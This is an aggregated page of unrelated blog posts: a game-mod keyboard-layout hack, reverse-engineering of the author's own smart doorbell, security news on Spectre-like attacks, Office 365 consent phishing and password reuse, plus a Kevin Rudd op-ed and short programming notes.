Planet Russell


Worse Than Failure: CodeSOD: A Key to Success

Sometimes bad code arises from incompetence, whether individual or, more usually, institutional. Sometimes it's overly tight deadlines or misguided architecture. And sometimes… it's just the easiest way.

Naomi writes in to confess to some bad code.

I've recently joined the team for a mod for the obscure-outside-its-niche Freespace Open engine. Now, in some ways, the engine is pretty modern - but it is based on 20+-year-old code, so it has its share of weird quirks.

I want to make a few things clear: this is a passion project for its developers, which they offer up for free to the fans, and from which Naomi has chosen to confess one of her minor WTFs. I'm sharing Naomi's submission because, well, we all find ourselves in positions where we write bad code to accomplish our goals. Consider this more a celebration of hacking around problems than a traditional WTF.

Game engines, in general, have a difficult relationship with keyboard layouts. A game engine from 1999 is no exception to that. While any halfway decent engine will allow control rebindings, they're not always able to adapt to more unusual configurations. For example, as someone who types Dvorak, I'll usually switch to QWERTY before firing up a game. But some games only see QWERTY, regardless of what I've told the OS to use for its layout. Some games will latch onto whatever the keyboard layout was when I launched the game- so if I accidentally launch in Dvorak, changing to QWERTY won't take effect until I relaunch the game. Very few game engines seem to be able to handle dynamic changes to the keyboard layout.

Now, this is a problem for a small number of users. Few game engine developers care. Few players care. And most of the time, players can work around the issues.

The Freespace engine didn't have much support for multiple keyboard layouts, but it wasn't a problem. If a player was using QWERTY, then the "Q" key could rebalance their shields, and the "A" key would accelerate their ship. The same keys would have the same behavior on an AZERTY keyboard- but their positions would be flipped. So most players would rebind- an AZERTY user would change "A" to be "shields" and "Q" to be accelerate.

And this was fine until someone added a hacking minigame to their mod. One player submitted a bug report: they couldn't pass the hacking minigame. Specifically, whatever they typed in came out wrong. And without the ability to type, they couldn't clear the mission.

Well, in this case, Naomi discovered that the user was using an AZERTY keyboard. Since the scripts controlling the hacking minigame are reading literal keypresses without applying a keyboard layout, it tries to interpret the AZERTY keystrokes as QWERTY keystrokes, zhich definitely ,qkes typing hqrd.

Naomi writes:

This might be a low priority for the engine maintainers, but it made the mod actually unplayable for some subset of users. A proper fix is coming in the next version of the engine... several months down the road, and we didn't want to wait that long. So, I authored this ridiculous hack.

--------------------------------
-- Freespace doesn't really handle different keyboard layouts very well. As a
-- workaround, we've chosen a key combination - Alt-Q - that is distinct on
-- QWERTY, AZERTY, and Dvorak keyboards. By listening for all three key
-- combinations, we can guess which mapping the user is actually using, and
-- adjust accordingly.
-- This is a horrible hack and should be removed as soon as FSO supports
-- these layouts properly.
local keyboards = {
    ['Alt-Q'] = {
        ['A'] = 'A', ['B'] = 'B', ['C'] = 'C', ['D'] = 'D', ['E'] = 'E',
        ['F'] = 'F', ['G'] = 'G', ['H'] = 'H', ['I'] = 'I', ['J'] = 'J',
        ['K'] = 'K', ['L'] = 'L', ['M'] = 'M', ['N'] = 'N', ['O'] = 'O',
        ['P'] = 'P', ['Q'] = 'Q', ['R'] = 'R', ['S'] = 'S', ['T'] = 'T',
        ['U'] = 'U', ['V'] = 'V', ['W'] = 'W', ['X'] = 'X', ['Y'] = 'Y',
        ['Z'] = 'Z',
        ['1'] = '1', ['2'] = '2', ['3'] = '3', ['4'] = '4', ['5'] = '5',
        ['6'] = '6', ['7'] = '7', ['8'] = '8', ['9'] = '9', ['0'] = '0',
        ['Spacebar'] = ' ', ['Backspace'] = 'Backspace', ['Enter'] = 'Enter'
    },
    ['Alt-A'] = {
        ['Q'] = 'A', ['B'] = 'B', ['C'] = 'C', ['D'] = 'D', ['E'] = 'E',
        ['F'] = 'F', ['G'] = 'G', ['H'] = 'H', ['I'] = 'I', ['J'] = 'J',
        ['K'] = 'K', ['L'] = 'L', [';'] = 'M', ['N'] = 'N', ['O'] = 'O',
        ['P'] = 'P', ['A'] = 'Q', ['R'] = 'R', ['S'] = 'S', ['T'] = 'T',
        ['U'] = 'U', ['V'] = 'V', ['Z'] = 'W', ['X'] = 'X', ['Y'] = 'Y',
        ['W'] = 'Z',
        ['1'] = '1', ['2'] = '2', ['3'] = '3', ['4'] = '4', ['5'] = '5',
        ['6'] = '6', ['7'] = '7', ['8'] = '8', ['9'] = '9', ['0'] = '0',
        ['Spacebar'] = ' ', ['Backspace'] = 'Backspace', ['Enter'] = 'Enter'
    }
}

Now, I'll be honest, as annoying as this code is to write or maintain, I don't know that it's fair to call it a "horrible hack", but certainly, it should hopefully go away. The choice of keys to control which mode you're in is actually rather nice- those keys are in the same physical position, regardless of which layout you're in. On Dvorak, that could be ALT+'.
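The detection trick is simple enough to sketch in a few lines. Here's a rough Python rendering of the idea (the mod itself is Lua, and the key names and state handling here are illustrative, not the mod's real API):

```python
# Sketch of the layout-detection hack: wait for one of the sentinel
# Alt-combos, then translate every raw keypress through the matching table.
# Key names and the state dict are placeholders, not the engine's API.

QWERTY = {ch: ch for ch in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}

# On AZERTY hardware the engine reports the QWERTY position, so the
# physical A/Q, Z/W and M/; keys arrive swapped.
AZERTY = dict(QWERTY)
AZERTY.update({'Q': 'A', 'A': 'Q', 'Z': 'W', 'W': 'Z', ';': 'M'})
del AZERTY['M']  # the M keycap position reports ';' instead

SENTINELS = {'Alt-Q': QWERTY, 'Alt-A': AZERTY}

def handle_key(state, key):
    """Return the translated character, or None for sentinels/unknown keys."""
    if key in SENTINELS:
        state['layout'] = SENTINELS[key]  # player revealed their layout
        return None
    return state.get('layout', QWERTY).get(key)

state = {}
handle_key(state, 'Alt-A')     # AZERTY player announces themselves
print(handle_key(state, 'Q'))  # -> A  (the raw 'Q' is really the A key)
```

Before the sentinel arrives, the sketch falls back to QWERTY, which matches the engine's default behavior.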

This, if you ask me, is a rather nice little solution to an ugly problem. Sure, it's a hack, but it gets the feature working, there's a plan for a longer term fix, and the stakes are really, really low. I think it's more important to actually deliver working functionality than anything else, so long as you know what mess you have to clean up in the future.

That's part of why I decided to share this snippet, because it's the kind of thing a developer might feel bad about writing, but honestly: they shouldn't. Yes, it's a hack, yes it's ugly, yes you don't want to maintain something like this any longer than you have to. But it also works, it resolves an issue for one of your users, and it allows you to focus on finding other ways to deliver value instead of agonizing over whether this is the "right" way to solve the problem.

The key to success, at the end of the day, is to write code that does something useful, or at least enjoyable.

Naomi concludes:

For the curious, there's no entry for Dvorak yet simply because I haven't found a Dvorak user to test it. And the weird mapping table existing in the first place isn't my fault. It was like that in the original script, which I didn't want to change too much for fear of introducing other, more exciting bugs.

Now, I'm not looking to add "testing a game I otherwise don't play" to my list of activities, but I hope Naomi finds another Dvorak user out there. There are dozens of us! Dozens!


Planet Debian: Matthew Garrett: More doorbell adventures

Back in my last post on this topic, I'd got shell on my doorbell but hadn't figured out why the HTTP callbacks weren't always firing. I still haven't, but I have learned some more things.

Doorbird sell a chime, a network connected device that is signalled by the doorbell when someone pushes a button. It costs about $150, which seems excessive, but would solve my problem (ie, that if someone pushes the doorbell and I'm not paying attention to my phone, I miss it entirely). But given a shell on the doorbell, how hard could it be to figure out how to mimic the behaviour of one?

Configuration for the doorbell is all stored under /mnt/flash, and there's a bunch of files prefixed 1000eyes that contain config (1000eyes is the German company that seems to be behind Doorbird). One of these was called 1000eyes.peripherals, which seemed like a good starting point. The initial contents were {"Peripherals":[]}, so it seemed likely that it was intended to be JSON. Unfortunately, since I had no access to any of the peripherals, I had no idea what the format was. I threw the main application into Ghidra and found a function that had debug statements referencing "initPeripherals" and read a bunch of JSON keys out of the file, so I could simply look at the keys it referenced and write out a file based on that. I did so, and it didn't work - the app stubbornly refused to believe that there were any defined peripherals. The check that was failing was pcVar4 = strstr(local_50[0],PTR_s_"type":"_0007c980);, which made no sense, since I very definitely had a type key in there. And then I read it more closely. strstr() wasn't being asked to look for "type":, it was being asked to look for "type":". I'd left a space between the : and the opening " in the value, which meant it wasn't matching. The rest of the function seems to call an actual JSON parser, so I have no idea why it doesn't just use that for this part as well, but deleting the space and restarting the service meant it now believed I had a peripheral attached.

The mobile app that's used for configuring the doorbell now showed a device in the peripherals tab, but it had a weird corrupted name. Tapping it resulted in an error telling me that the device was unavailable, and on the doorbell itself generated a log message showing it was trying to reach a device with the hostname bha-04f0212c5cca and (unsurprisingly) failing. The hostname was being generated from the MAC address field in the peripherals file and was presumably supposed to be resolved using mDNS, but for now I just threw a static entry in /etc/hosts pointing at my Home Assistant device. That was enough to show that when I opened the app the doorbell was trying to call a CGI script called peripherals.cgi on my fake chime. When that failed, it called out to the cloud API to ask it to ask the chime[1] instead. Since the cloud was completely unaware of my fake device, this didn't work either. I hacked together a simple server using Python's HTTPServer and was able to return data (another block of JSON). This got me to the point where the app would now let me get to the chime config, but would then immediately exit. adb logcat showed a traceback in the app caused by a failed assertion due to a missing key in the JSON, so I ran the app through jadx, found the assertion and from there figured out what keys I needed. Once that was done, the app opened the config page just fine.
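A fake-chime responder like the one described takes only a few lines of stdlib Python. This is a hedged reconstruction, not the actual server: the path the doorbell requests (peripherals.cgi) comes from the post above, but the JSON keys the app asserts on came from jadx and are stood in for by a placeholder payload here:

```python
# Minimal stand-in for the fake chime: answer every GET with a canned JSON
# body. CANNED is a placeholder; the real keys are whatever the app's
# assertions (recovered via jadx) demand.
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

CANNED = {"Peripherals": []}  # placeholder, not the real chime response

class FakeChime(BaseHTTPRequestHandler):
    def do_GET(self):
        body = json.dumps(CANNED).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the console quiet
        pass

# To serve for real: HTTPServer(("0.0.0.0", 80), FakeChime).serve_forever()
```

Pointing the /etc/hosts entry for the bha- hostname at the machine running this is enough for the doorbell's CGI calls to land somewhere answerable.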

Unfortunately, though, I couldn't edit the config. Whenever I hit "save" the app would tell me that the peripheral wasn't responding. This was strange, since the doorbell wasn't even trying to hit my fake chime. It turned out that the app was making a CGI call to the doorbell, and the thread handling that call was segfaulting just after reading the peripheral config file. This suggested that the format of my JSON was probably wrong and that the doorbell was not handling that gracefully, but trying to figure out what the format should actually be didn't seem easy and none of my attempts improved things.

So, new approach. Rather than writing the config myself, why not let the doorbell do it? I should be able to use the genuine pairing process if I could mimic the chime sufficiently well. Hitting the "add" button in the app asked me for the username and password for the chime, so I typed in something random in the expected format (six characters followed by four zeroes) and a sufficiently long password and hit ok. A few seconds later it told me it couldn't find the device, which wasn't unexpected. What was a little more unexpected was that the log on the doorbell was showing it trying to hit another bha-prefixed hostname (and, obviously, failing). The hostname contains the MAC address, but I hadn't told the doorbell the MAC address of the chime, just its username. Some more digging showed that the doorbell was calling out to the cloud API, giving it the 6 character prefix from the username and getting a MAC address back. Doing the same myself revealed that there was a straightforward mapping from the prefix to the mac address - changing the final character from "a" to "b" incremented the MAC by one. It's actually just a base 26 encoding of the MAC, with aaaaaa translating to 00408C000000.
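That mapping is easy to sanity-check in code. The sketch below is my inference, not vendor documentation: it assumes 'a' = 0, the six letters form a big-endian base-26 number, and the 00:40:8C vendor prefix is fixed, which is consistent with "aaaaaa" translating to 00408C000000 and the final-letter increment behavior:

```python
# Sketch of the apparent username-prefix -> MAC mapping (assumptions above).
OUI = 0x00408C  # vendor prefix implied by the "aaaaaa" example

def prefix_to_mac(prefix: str) -> str:
    """Decode a 6-letter username prefix into a 12-hex-digit MAC."""
    assert len(prefix) == 6 and prefix.isalpha()
    n = 0
    for ch in prefix.lower():
        n = n * 26 + (ord(ch) - ord('a'))
    return f"{(OUI << 24) | n:012X}"

def mac_to_prefix(mac: str) -> str:
    """Inverse: encode the low 24 bits of a MAC back into six letters."""
    n = int(mac, 16) & 0xFFFFFF
    chars = []
    for _ in range(6):
        n, r = divmod(n, 26)
        chars.append(chr(ord('a') + r))
    return ''.join(reversed(chars))

print(prefix_to_mac("aaaaaa"))  # -> 00408C000000
print(prefix_to_mac("aaaaab"))  # -> 00408C000001
```

mac_to_prefix is the "work backwards" step: given the hostname already in /etc/hosts, it yields a username the doorbell will resolve to that same host.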

That explained how the hostname was being generated, and in return I was able to work backwards to figure out which username I should use to generate the hostname I was already using. Attempting to add it now resulted in the doorbell making another CGI call to my fake chime in order to query its feature set, and by mocking that up as well I was able to send back a file containing X-Intercom-Type, X-Intercom-TypeId and X-Intercom-Class fields that made the doorbell happy. I now had a valid JSON file, which cleared up a couple of mysteries. The corrupt name was because the name field isn't supposed to be ASCII - it's base64 encoded UTF16-BE. And the reason I hadn't been able to figure out the JSON format correctly was because it looked something like this:


Note that there's a total of one [ in this file, but two ]s? Awesome. Anyway, I could now modify the config in the app and hit save, and the doorbell would then call out to my fake chime to push config to it. Weirdly, the association between the chime and a specific button on the doorbell is only stored on the chime, not on the doorbell. Further, hitting the doorbell didn't result in any more HTTP traffic to my fake chime. However, it did result in some broadcast UDP traffic being generated. Searching for the port number led me to the Doorbird LAN API and a complete description of the format and encryption mechanism in use. Argon2I is used to turn the first five characters of the chime's password (which is also stored on the doorbell itself) into a 256-bit key, and this is used with ChaCha20 to decrypt the payload. The payload then contains a six character field describing the device sending the event, and then another field describing the event itself. Some more scrappy Python and I could pick up these packets and decrypt them, which showed that they were being sent whenever any event occurred on the doorbell. This explained why there was no storage of the button/chime association on the doorbell itself - the doorbell sends packets for all events, and the chime is responsible for deciding whether to act on them or not.

On closer examination, it turns out that these packets aren't just sent if there's a configured chime. One is sent for each configured user, avoiding the need for a cloud round trip if your phone is on the same network as the doorbell at the time. There was literally no need for me to mimic the chime at all, suitable events were already being sent.

Still. There's a fair amount of WTFery here: the strstr()-based JSON parsing, the invalid JSON, the symmetric encryption that uses device passwords as the key (requiring the doorbell to be aware of the chime's password), and the use of only the first five characters of the password as input to the KDF. It doesn't give me a great deal of confidence in the rest of the device's security, so I'm going to keep playing.

[1] This seems to be to handle the case where the chime isn't on the same network as the doorbell



Cryptogram: The Story of Colossus

Nice video of a talk by Chris Shore on the history of Colossus.

Cryptogram: New Spectre-Like Attacks

There’s new research that demonstrates security vulnerabilities in all of the AMD and Intel chips with micro-op caches, including the ones that were specifically engineered to be resistant to the Spectre/Meltdown attacks of three years ago.


The new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a writeup from the University of Virginia. Even though the processor quickly realizes its mistake and does a U-turn to go down the right path, attackers can get at the private data while the processor is still heading in the wrong direction.

It seems really difficult to exploit these vulnerabilities. We’ll need some more analysis before we understand what we have to patch and how.

More news.

Rondam Ramblings: Republican Hypocrisy Watch: Cancel Culture is Bad -- Unless it's Republicans Doing the Cancelling

The brazen shamelessness of Republican hypocrisy is on full display as they move to remove Liz Cheney from her leadership position for daring to say that Donald Trump lost the election, while at the same time whining about cancel culture. I am really beginning to wonder if there is anyone left in the Republican party who realizes that you can only act like the old Soviet politburo for so long.

Krebs on Security: Malicious Office 365 Apps Are the Ultimate Insiders

Phishers targeting Microsoft Office 365 users increasingly are turning to specialized links that take users to their organization’s own email login page. After a user logs in, the link prompts them to install a malicious but innocuously-named app that gives the attacker persistent, password-free access to any of the user’s emails and files, both of which are then plundered to launch malware and phishing scams against others.

These attacks begin with an emailed link that, when clicked, loads not a phishing site but the user’s actual Office 365 login page — whether that be at Microsoft’s own domain or their employer’s. After logging in, the user might see a prompt that looks something like this:

These malicious apps allow attackers to bypass multi-factor authentication, because they are approved by the user after that user has already logged in. Also, the apps will persist in a user’s Office 365 account indefinitely until removed, and will survive even after an account password reset.

This week, messaging security vendor Proofpoint published some new data on the rise of these malicious Office 365 apps, noting that a high percentage of Office users will fall for this scheme [full disclosure: Proofpoint is an advertiser on this website].

Ryan Kalember, Proofpoint’s executive vice president of cybersecurity strategy, said 55 percent of the company’s customers have faced these malicious app attacks at one point or another.

“Of those who got attacked, about 22 percent — or one in five — were successfully compromised,” Kalember said.

Kalember said Microsoft last year sought to limit the spread of these malicious Office apps by creating an app publisher verification system, which requires the publisher to be a valid Microsoft Partner Network member.

That approval process is cumbersome for attackers, so they’ve devised a simple workaround. “Now, they’re compromising accounts in credible tenants first,” Proofpoint explains. “Then, they’re creating, hosting and spreading cloud malware from within.”

The attackers responsible for deploying these malicious Office apps aren’t after passwords, and in this scenario they can’t even see them. Rather, they’re hoping that after logging in, users will click yes to approve the installation of a malicious but innocuously-named app into their Office 365 account.

Kalember said the crooks behind these malicious apps typically use any compromised email accounts to conduct “business email compromise” or BEC fraud, which involves spoofing an email from someone in authority at an organization and requesting the payment of a fictitious invoice. Other uses have included the sending of malware-laced emails from the victim’s email account.

Last year, Proofpoint wrote about a service in the cybercriminal underground where customers could access various Office 365 accounts without a username or password. The service also advertised the ability to extract and filter emails and files based on selected keywords, as well as attach malicious macros to all documents in a user’s Microsoft OneDrive.

A cybercriminal service advertising the sale of access to hacked Office365 accounts. Image: Proofpoint.

“You don’t need a botnet if you have Office 365, and you don’t need malware if you have these [malicious] apps,” Kalember said. “It’s just easier, and it’s a good way to bypass multi-factor authentication.”

KrebsOnSecurity first warned about this trend in January 2020. That story cited Microsoft saying that while organizations running Office 365 could enable a setting to restrict users from installing apps, doing so was a “drastic step” that “severely impairs your users’ ability to be productive with third-party applications.”

Since then, Microsoft added a policy that allows Office 365 administrators to block users from consenting to an application from a non-verified publisher. Also, applications published after November 8, 2020, are coupled with a consent screen warning in case the publisher is not verified, and the tenant policy allows the consent.

Microsoft’s instructions for detecting and removing illicit consent grants in Office 365 are here.

Proofpoint says O365 administrators should limit or block which non-administrators can create applications, and enable Microsoft’s verified publisher policy — as a majority of cloud malware is still coming from Office 365 tenants that are not part of Microsoft’s partner network. Experts say it’s also important to ensure you have security logging turned on so that alerts are generated when employees are introducing new software into your infrastructure.

Kevin Rudd: The Guardian: Scott Morrison’s partisan interpretation of biblical passages is disturbing for democracy

When the federation’s founding fathers were framing Australia’s constitution in the 1890s, there was intense debate about whether organised religion should get a guernsey. Fortunately, despite the religiosity of the Victorian era, sounder heads prevailed. Unlike in the United Kingdom, our antipodean commonwealth would have no established religion.

Admittedly, “Almighty God” makes a single appearance in the constitution’s preamble, but the founders consciously decided to give divinity no institutional role. Instead, they resolved that our commonwealth should be secular, governed by a secular executive and accountable to a secular parliament.

The founders knew too well how much blood had been previously spilled at the intersection of religious fervour and the political powers of the state.

This isn’t to discount the profound effect of Christianity on our nation’s history. The churches were largely responsible for our earliest efforts to provide education, health and welfare services for the poor. It took decades for the state to assume primary responsibility for what are now regarded as essential functions of government.

Equally, Christians of various denominations have been elected to parliament over the past 120 years. But whether MPs were Christian, Jewish, Muslim, atheist or agnostic, they have conducted the substantive business of parliament in secular terms.

Irrespective of whether members’ positions have been influenced by theology, philosophy or pure political pragmatism, the terms of debate have been anchored in rational argument, empirical evidence and party philosophy. In other words, in the great contest of ideas, proposals are forced to stand on their merit, rather than relying on the self-evident “truths” of divine relation. By and large, our secular political system has worked. Our democracy has been stable, and our parliament preserved from the theocratic impulses of our more extreme religious denominations.

Whenever concerns are raised about Scott Morrison’s Pentecostal belief, it has become customary to point the finger at my own religious practice as a Labor prime minister of Christian faith. The argument goes: why should Morrison be held to any particular scrutiny since Rudd and his family regularly attended their local Anglican church, calling press conferences in the churchyard?

Like many things in political life, this has become an accepted meme of the Liberal National party and the Murdoch media. The only problem is, it isn’t true.

Yes, throughout our adult lives, Therese and I have professed Christian faith. She was raised Anglican, myself a Roman Catholic, so we started attending one church together as a family. In Brisbane, we attended St John’s in Bulimba, and in Canberra, St John’s in Reid, for more than 30 years.

When I entered politics, journalists would occasionally arrive without invitation to pepper me with questions about the news of the day, either before or after services. It was a convenient stakeout for them. Despite my wishing that they wouldn’t gather there, I learned to stop and answer a few questions outside the church gate to avoid a media circus.

I have never believed that God was “on my side” in any election campaign – a position which, if held by any prime minister, would be borderline theocracy – nor have I ever believed that God could speak to me or send me revelations about what to do as a politician.

My simple, garden-variety theology is this: the God of the New Testament gives preference to the poor, the outcast and the oppressed and, to the greatest extent possible, I should do the same, while also being a good custodian of the planet.

From what we can discern from the public record, Morrison’s political theology is radically different.

His tradition, Pentecostalism, often emphasises the highly individualised “health and wealth gospel” – that if you are godly, then you will be both healthy and wealthy. Questions of human sexuality tend to elicit a deeply conservative, fundamentalist answer. The Pentecostal tradition also includes communicating with God through “speaking in tongues” and the ability to discern God’s will by being attentive to those with the prophetic “word of knowledge”. In other words, some Pentecostal leaders believe they can communicate directly with God in the here and now, and then proceed to act as God wishes them to. These Pentecostal tenets can present problems for our secular democracy, as elucidated by Morrison’s speech to a Pentecostal conference on the Gold Coast last week.

First, Morrison made extensive reference to kings and prophets from the Old Testament. Morrison’s exegesis was highly individualistic. In the case of Isaiah, Morrison’s speech implies that, during the last federal election, God spoke to him through a painting of an eagle (which Morrison interpreted as him being elevated by the divine in his earthly contest against the Labor party).

Such a politically partisan interpretation of biblical passages is disturbing for our secular democracy. More fundamentally, it is worrying if the prime minister believes God somehow speaks directly to him.

Second, there is a troubling section of Morrison’s speech where he indicates that humans aren’t capable of fixing problems on Earth. Instead, he says, that’s the responsibility of God; and what the country needs, therefore, is the growth of the church.

The problem with this approach is that it effectively consigns responsibility for poverty and the despoliation of the planet to powers beyond our control, as we drift to a utopian afterlife. This sort of “millennialism” has been a problem in the church for the past 2,000 years as it diminishes the role of human agency in “fixing” demonstrable social and economic injustices. The logical conclusion is that our best tool to deal with such challenges is prayer, and that’s just a cop-out.

Third, the very idea that a prime minister could happily go around “laying on hands” on unsuspecting civilians to impart the healing power of prayer is troubling. The critical thing lacking is the person’s knowledge and consent. This doesn’t seem to bother Morrison, who apparently believes he’s not only the chief minister of the commonwealth but also its chief priest. This is a fundamental breach of the secularity of our political institutions.

Fourth, the problem with Morrison’s overall theology – his preoccupation with the kings and prophets of the Old Testament, his diminution of human as opposed to divine agency, and his exercise of priestly functions without permission – is that it undermines the role of reason, evidence and fact in faith.

The mainstream church, since the days of St Thomas Aquinas in the 13th century, has considered that faith should be tempered by reason. In the long history of the church, fundamentalist traditions have railed against reason and empiricism, instead emphasising absolute faith as the hallmark of an authentic Christian.

By and large, Pentecostalism emerges from this tradition. It is a worldview that sits uncomfortably with the extraordinary powers of the secular office of prime minister.

Pentecostal churches have long attracted good, honest Australians from across the political spectrum – but the reality is the Liberal National party is now deliberately targeting these churches as recruiting grounds. In my own state of Queensland, the Christian right faction within the LNP is substantially Pentecostal. These recruitment drives are pushing that party further and further to the political hard right. Secular rationalists are now becoming an endangered species within many branches of the conservative parties, contributing to the growing polarisation of our politics, as in America.

It may be that Morrison has solid answers to my reservations. Before becoming prime minister in 2007, I wrote a lengthy essay for the Monthly magazine that outlined my own positions on the role that Christian belief should play within our secular democracy. It is high time for Morrison to do the same, not least to allay the doubts of Australians who have been deeply disturbed by the grainy footage of his extraordinary remarks last week.

I have no doubt that Morrison’s faith is genuine. For some years, we attended the same parliamentary Christian fellowship. My question is not about his sincerity of faith, but the need for him to be absolutely transparent with the Australian people, through the secular marketplace of our national politics, about the precise impact of his Pentecostal theology on Australian public policy and politics.

First published in The Guardian


The post The Guardian: Scott Morrison’s partisan interpretation of biblical passages is disturbing for democracy appeared first on Kevin Rudd.

Worse Than Failure: CodeSOD: Touch of Death

Unit testing in C offers its own special challenges. Unit testing an application heavily dependent upon threads, written in C, offers even more.

Brian inherited an application where the main loop of the actual application looked something like:

int main(int argc, char **argv)
{
    msg_t *msg;

    if (!init())
        exit(EXIT_FAILURE);

    for ( ; ; ) {
        msg = get_msg();
        if (msg == NULL)
            continue;
        process_msg(msg);
    }
}

Read an input message, handle the message, read the next message, in an endless loop. Now, that's a perfectly reasonable main method for a message-oriented service, but certainly you wouldn't want to unit test that way.

Brian writes:

As it turns out, this particular test application is just a clone of the application it is supposed to test, but it's linked with a "brillant" test framework rather than the normal application framework.

The test application would read test messages from an input file, which allowed it to simulate receiving messages. It would then pass those messages off to the code being tested. It's the way it decided testing was over where the problems showed up:

msg_t *get_msg()
{
    struct stat fileInfo;
    char rec[1024];

    /* touch stoptesting to shutdown this application */
    if (stat("stoptesting", &fileInfo) != -1) {
        printf("Done testing...");
        system("rm stoptesting");
        if (shutdownFn)
            shutdownFn();
        exit(EXIT_SUCCESS);
    }

    if (fgets(rec, sizeof(rec), inFile) == NULL || feof(inFile)) {
        return NULL;
    }

    return fileRecordToMsg(rec);
}

The test application stats a file called stoptesting. If the file exists, the program exits. It uses system("rm stoptesting") to call out to the shell to remove the file (ignoring the perfectly good unlink syscall). The only indication that this is how you stop the application is that comment in the middle of the method.
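For comparison, the same stop-file check without shelling out might look like this. This is a sketch, not the actual fix; it leaves shutdownFn and exit() to the caller, and should_stop is a name invented here:

```c
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Sketch: detect and remove the stop file with unlink(2) instead of
 * system("rm ..."), returning 1 when testing should end. */
static int should_stop(void)
{
    struct stat fileInfo;

    if (stat("stoptesting", &fileInfo) == -1)
        return 0;               /* no stop file: keep testing */

    printf("Done testing...\n");
    if (unlink("stoptesting") == -1)
        perror("unlink");       /* report, but still shut down */
    return 1;
}
```

get_msg() could then call should_stop() and run shutdownFn()/exit() itself exactly as before, minus the fork and exec of a shell for a one-syscall job.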

If, like Brian, you didn't read through every single line of code before running the test application, you'd find yourself staring at a program that refuses to exit, but also isn't using any meaningful quantities of CPU, which makes you assume something is wrong with your test program.

Which yes, there is something wrong with the test program. More than one thing, actually. Sure, the "touch a file to exit" is wrong, but as Brian points out, so is the name of the file:

The real WTF? They should have named the file "ofdeath" so at least shutting it down would be fun:

$ touch ofdeath


Planet DebianJunichi Uekawa: Wrote a pomodoro timer in elisp.

Wrote a pomodoro timer in elisp. Why? Because I try to keep my workflow simple, and to keep that simplicity I sometimes need to re-implement stuff. No, this is a lame excuse: I have been living in emacs for the past week and felt like it. However, writing elisp has been challenging, maybe because I haven't done it for a while. I noticed there's lexical-binding, but I didn't quite get it; my lambda isn't getting the function parameter in scope.


Krebs on SecurityThe Wages of Password Re-use: Your Money or Your Life

When normal computer users fall into the nasty habit of recycling passwords, the result is most often some type of financial loss. When cybercriminals develop the same habit, it can eventually cost them their freedom.

Our passwords can say a lot about us, and much of what they have to say is unflattering. In a world in which all databases — including hacker forums — are eventually compromised and leaked online, it can be tough for cybercriminals to maintain their anonymity if they’re in the habit of re-using the same unusual passwords across multiple accounts associated with different email addresses.

The long-running Breadcrumbs series here tracks how cybercriminals get caught, and it’s mostly through odd connections between their online and offline selves scattered across the Internet. Interestingly, one of the more common connections involves re-using or recycling passwords across multiple accounts.

And yes, hackers get their passwords compromised at the same rate as the rest of us. Which means when a cybercrime forum gets hacked and its user databases posted online, it is often possible to work backwards from some of the more unique passwords for each account and see where else that password was used.


Of all the stories I’ve written here over the last 11 years, probably the piece I get asked most to recount is the one about Sergey “Fly” Vovnenko, a Ukrainian man who in 2013 hatched and executed a plan to buy heroin off the dark web, ship it to our house and then spoof a call to the police from one of our neighbors saying we were dealing drugs.

Fly was the administrator of a Russian-language identity theft forum at the time, and as a secret lurker on his forum KrebsOnSecurity watched his plan unfold in real time. As I described in a 2019 story about an interview Fly gave to a Russian publication upon his release from a U.S. prison, his propensity for password re-use ultimately landed him in Italy’s worst prison for more than a year before he was extradited to face charges in America.

Around the same time Fly was taking bitcoin donations for a fund to purchase heroin on my behalf, he was also engaged to be married to a young woman. But Fly apparently did not fully trust his bride-to-be, so he had malware installed on her system that forwarded him copies of all email that she sent and received.

But Fly would make at least two big operational security mistakes in this spying effort: First, he had his fiancée’s messages forwarded to an email account he’d used for plenty of cybercriminal stuff related to his various “Fly” identities.

Mistake number two was the password for his email account was the same as his cybercrime forum admin account. And unbeknownst to him at the time, that forum was hacked, with all email addresses and hashed passwords exposed.

Soon enough, investigators were reading Fly’s email, including the messages forwarded from his wife’s account that had details about their upcoming nuptials, such as shipping addresses for their wedding-related items and the full name of Fly’s fiancée. It didn’t take long to zero in on Fly’s location in Naples.


While it may sound unlikely that a guy so enmeshed in the cybercrime space could make such rookie security mistakes, I have found that a great many cybercriminals actually have worse operational security than the average Internet user.

Countless times over the years I’ve encountered huge tranches of valuable, dangerous data — like a botnet control panel or admin credentials for cybercrime forums — that were full of bad passwords, like password1 or 123qweasd (an incredibly common keyboard pattern password).

I suspect this may be because the nature of illicit activity online requires cybercrooks to create vast numbers of single- or brief-use accounts, and as such they tend to re-use credentials across multiple sites, or else pick very poor passwords — even for critical resources.

Regardless of their reasons or lack thereof for choosing poor passwords, it is fascinating that in terms of maintaining one’s operational security it actually benefits cybercriminals to use poor passwords in many situations.

For example, it is often the denizens of the cybercrime underground who pick crappy passwords for their forum accounts who end up doing their future selves a favor when the forum eventually gets hacked and its user database is posted online.


It really stinks that it’s mid-2021 and we’re still so reliant on passwords. But as long as that’s the case, I hope it’s clear that the smartest choice for all Internet users is to pick unique passwords for every site. The major Web browsers will now auto-suggest long, complex and unique passwords when users go to set up a new account somewhere online, and this is obviously the simplest way to achieve that goal.

Password managers are ideal for people who can’t break the habit of re-using passwords, because you only have to remember one (strong) master password to access all of your stored credentials.

If you don’t trust password managers and have trouble remembering complex passwords, consider relying instead on password length, which is a far more important determiner of whether a given password can be cracked by available tools in any timeframe that might be reasonably useful to an attacker.

In that vein, it’s safer and wiser to focus on picking passphrases instead of passwords. Passphrases are collections of multiple (ideally unrelated) words mushed together. Passphrases are not only generally more secure, they also have the added benefit of being easier to remember. Their main limitation is that countless sites still force you to add special characters and place arbitrary limits on password length possibilities.

Finally, there’s absolutely nothing wrong with writing down your passwords, provided a) you do not store them in a file on your computer or taped to your laptop, and b) that your password notebook is stored somewhere relatively secure, i.e. not in your purse or car, but something like a locked drawer or safe.

Further reading: Who’s Behind the GandCrab Ransomware?

Planet DebianSteve Kemp: Password store plugin: env

Like many I use pass for storing usernames and passwords. This gives me easy access to credentials in a secure manner.

I don't like the way that the metadata (i.e. filenames) are public, but that aside it is a robust tool I've been using for several years.

